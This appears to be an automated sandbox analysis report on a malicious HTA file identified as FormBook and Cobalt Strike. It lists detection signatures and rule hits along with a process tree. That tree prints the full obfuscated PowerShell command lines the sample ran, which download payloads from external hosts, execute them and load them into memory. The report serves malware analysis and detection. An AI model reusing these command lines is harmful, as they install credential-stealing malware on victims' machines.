Windows
Analysis Report
creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta
Overview
General Information
Detection
Cobalt Strike, FormBook, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
PowerShell case anomaly found
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7544 cmdline: mshta.exe "C:\Users\user\Desktop\creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 7648 cmdline: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX ($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- csc.exe (PID: 7924 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 7940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA57E.tmp" "c:\Users\user\AppData\Local\Temp\uzumsuzj\CSC9B0A3672FBDD48D4844B884E3D96D699.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- wscript.exe (PID: 8044 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" MD5: FF00E0480075B095948000BDC66E81F0)
- powershell.exe (PID: 8096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7184 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- aspnet_compiler.exe (PID: 3676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
- aspnet_compiler.exe (PID: 7412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
- TjxlUxenxgDChq.exe (PID: 4572 cmdline: "C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
- cleanmgr.exe (PID: 7636 cmdline: "C:\Windows\SysWOW64\cleanmgr.exe" MD5: 527CCDB339E5A54F4B37B6FAD08A44B5)
- TjxlUxenxgDChq.exe (PID: 3000 cmdline: "C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
- firefox.exe (PID: 688 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. | | | |
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
(5 of 14 entries shown)

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |